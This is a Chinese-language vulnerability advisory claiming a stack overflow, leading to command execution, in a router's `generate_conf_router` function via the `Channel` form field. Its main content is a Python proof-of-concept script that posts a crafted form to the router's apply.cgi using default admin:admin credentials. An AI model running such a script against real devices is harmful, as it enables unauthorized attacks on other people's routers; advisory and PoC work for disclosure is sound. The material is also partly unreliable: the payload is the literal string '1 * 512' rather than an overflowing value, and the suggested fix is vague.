### 漏洞概述

该漏洞涉及 `generate_conf_router` 函数中的栈溢出问题,可能导致任意命令执行。具体来说,`Channel` 变量通过 `nvram_get` 函数从 `Web_URL` 获取,并在 `generate_conf_router` 函数中被使用,导致栈溢出。

### 影响范围

- **受影响组件**:`generate_conf_router` 函数
- **潜在风险**:任意命令执行

### 修复方案

- **移除不必要的行**:在 `generate_conf_router` 函数中移除不必要的行,以防止栈溢出。

### POC 代码

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AP Client - Channel Injection

Proof-of-concept request against the hard-coded LAN address below. The
request is plain HTTP and carries HTTP Basic credentials in the
``Authorization`` header, so as written it is an authenticated submission of
the AP-client scan form; only the ``Channel`` field carries the test value.
"""

import requests
import json
from urllib.parse import urlencode

# Silences urllib3's insecure-request warnings; the target URL is http://, so
# neither this nor verify=False below affects the actual request.
requests.packages.urllib3.disable_warnings()

# Static description of the single request this script sends: target URL,
# browser-like headers, and the form fields of apclient_scan.asp.
request = {
    "name": "AP Client - Channel Injection",
    "method": "POST",
    "url": "http://192.168.10.1/apply.cgi",
    "referer": "http://192.168.10.1/apclient_scan.asp",
    "headers": {
        "Cache-Control": "max-age=0",
        "Authorization": "Basic YWRtaW46YWRtaW4=",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
    },
    "data": {
        "submit_button": "apclient_scan",
        "change_action": "",
        "wan_proto": "9",
        "action": "Apply",
        "wan_dns_enable": "1",
        "ApCliEnable": "1",
        "ApCliBssid": "",
        "Channel": "1 * 512",
        "ApCliBridgeEnable": "1",
        "ApClientBridgeEnable": "on",
        "ApCliSsid": "Remote_AP_SSID",
        "ApCliAutoMode": "OPEN",
        "ApCliEncryptType": "NONE",
        "ApCli_wl_wep_len": "0",
        "ApCliDefaultKeyID": "1",
        "ApCliKeyType": "0",
        "ApCliKey1Str": "************",
        "ApCliKey2Type": "0",
        "ApCliKey2Str": "************",
        "ApCliKey3Type": "0",
        "ApCliKey3Str": "************",
        "ApCliKey4Type": "0",
        "ApCliKey4Str": "************",
        "ApCliWPAEncrType": "TKIP",
        "ApCliWPAKey": "12345678",
    },
}


def _build_headers():
    """Return a fresh header dict: the static headers plus Origin and Referer.

    The static ``request["headers"]`` mapping is never mutated.
    """
    return {
        **request["headers"],
        "Origin": "http://192.168.10.1",
        "Referer": request["referer"],
    }


def send_request():
    """Send the configured HTTP POST and print a short summary of the reply.

    Returns:
        The ``requests.Response`` on success, or ``None`` if any exception was
        raised while building or sending the request (the error is printed).
    """
    try:
        headers = _build_headers()
        form = request["data"]
        # Sum of the stringified field values, not the encoded body size.
        form_size = sum(len(str(value)) for value in form.values())

        for line in (
            f"[+] 发送请求: {request['name']}",
            f"[+] URL: {request['url']}",
            f"[+] Referer: {request['referer']}",
            f"[+] 数据长度: {form_size} bytes\n",
        ):
            print(line)

        response = requests.post(
            request["url"],
            data=form,
            headers=headers,
            timeout=10,
            verify=False,
        )

        for line in (
            f"[+] 状态码: {response.status_code}",
            f"[+] 响应长度: {len(response.text)} bytes",
            f"[+] 响应头: {dict(response.headers)}\n",
        ):
            print(line)
        return response
    except Exception as e:
        # Best-effort reporting: connection errors, timeouts, etc. are printed
        # rather than propagated, matching the script's interactive use.
        print(f"[-] 错误: {e}\n")
        return None


if __name__ == "__main__":
    send_request()
```